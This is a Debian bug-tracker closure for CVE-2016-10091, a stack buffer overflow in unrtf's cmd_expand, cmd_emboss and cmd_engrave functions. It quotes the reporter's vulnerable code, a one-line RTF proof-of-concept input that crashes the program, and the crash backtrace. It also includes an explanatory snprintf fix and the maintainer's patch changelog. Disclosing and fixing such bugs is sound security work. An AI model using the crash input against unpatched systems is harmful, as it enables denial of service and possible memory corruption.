Your message dated Sat, 31 Dec 2016 19:49:28 +0000
with message-id <[email protected]>
and subject line Bug#849705: fixed in unrtf 0.21.9-clean-3
has caused the Debian Bug report #849705,
regarding unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
849705: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=849705
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: unrtf
Version: 0.21.9-clean-2

I've found a stack-based buffer overflow in unrtf 0.21.9, which affects three functions: cmd_expand, cmd_emboss and cmd_engrave.

# convert.c

static int
cmd_expand (Word *w, int align, char has_param, int param) {
	char str[10];                    // room for 9 characters plus the terminating NUL
	if (has_param) {
		sprintf(str, "%d", param/4); // Overflow: a 9-digit negative value (sign + 9 digits + NUL = 11 bytes) triggers the bug
		if (!param)
			attr_pop(ATTR_EXPAND);
		else
			attr_push(ATTR_EXPAND, str);
	}
	return FALSE;
}

Apparently writing a negative integer to the buffer can trigger the overflow (the minus sign needs an extra byte).

* How to trigger the bug *

$ echo "\expnd-400000000" > poc
$ unrtf poc

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
*** buffer overflow detected ***: unrtf terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
/lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
/lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
unrtf[0x804c7b8]
unrtf[0x804f77d]
unrtf[0x804f9e7]
unrtf[0x804920b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
unrtf[0x804953c]
Aborted

* Test environment *

Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
libc6 2.24-8

Regards,
Amir



--- End Message ---
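As an added illustration (not code from the report or from unrtf itself), the following works through the arithmetic behind the finding above and shows a bounded replacement for the sprintf pattern; the names expand_len_needed, expand_fits_fixed_buffer and cmd_expand_safe are hypothetical, and FIXED_BUF mirrors the 10-byte str[] in the report.

```c
#include <stdio.h>
#include <string.h>
#include <limits.h>

/* Size of the fixed buffer used by the vulnerable cmd_expand (constructed to match the report). */
#define FIXED_BUF 10

/* Bytes sprintf needs, including the NUL, to print param/4 as "%d".
 * Exactly the amount the vulnerable code writes into its 10-byte buffer. */
static size_t expand_len_needed(int param)
{
    return (size_t)snprintf(NULL, 0, "%d", param / 4) + 1;
}

/* Returns 1 if the value fits in the fixed buffer, 0 if the unbounded sprintf would overflow it.
 * The PoC \expnd-400000000 gives param/4 = -100000000: 10 characters + NUL = 11 bytes. */
static int expand_fits_fixed_buffer(int param)
{
    return expand_len_needed(param) <= FIXED_BUF;
}

/* Hardened variant: bounded formatting plus a truncation check, so an
 * out-of-range parameter is rejected instead of written past the buffer. */
static int cmd_expand_safe(int param, char *out, size_t out_sz)
{
    int n = snprintf(out, out_sz, "%d", param / 4);
    if (n < 0 || (size_t)n >= out_sz) {
        out[0] = '\0';
        return -1; /* would not fit; caller treats the control word as malformed */
    }
    return 0;
}

int main(void)
{
    char out[FIXED_BUF];
    int poc = -400000000; /* parameter from the reporter's PoC */
    printf("param/4 = %d needs %zu bytes, buffer holds %d: %s\n",
           poc / 4, expand_len_needed(poc), FIXED_BUF,
           expand_fits_fixed_buffer(poc) ? "fits" : "overflow");
    printf("bounded variant rc = %d\n", cmd_expand_safe(poc, out, sizeof out));
    return 0;
}
```

Any int needs at most 12 bytes as "%d" (sign, 10 digits, NUL), so a 10-byte buffer is too small whenever the quotient has a sign and 9 or more digits, which is what the report describes.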
--- Begin Message ---
Source: unrtf
Source-Version: 0.21.9-clean-3

We believe that the bug you reported is fixed in the latest version of
unrtf, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Willi Mann <[email protected]> (supplier of updated unrtf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 31 Dec 2016 20:35:19 +0100
Source: unrtf
Binary: unrtf
Architecture: source
Version: 0.21.9-clean-3
Distribution: unstable
Urgency: high
Maintainer: Willi Mann <[email protected]>
Changed-By: Willi Mann <[email protected]>
Description:
 unrtf      - RTF to other formats converter
Closes: 849705
Changes:
 unrtf (0.21.9-clean-3) unstable; urgency=high
 .
   * Security fix
   * Add patch from upstream to fix CVE-2016-10091 (buffer overflow in various
     cmd_ functions). closes: 849705


--- End Message ---
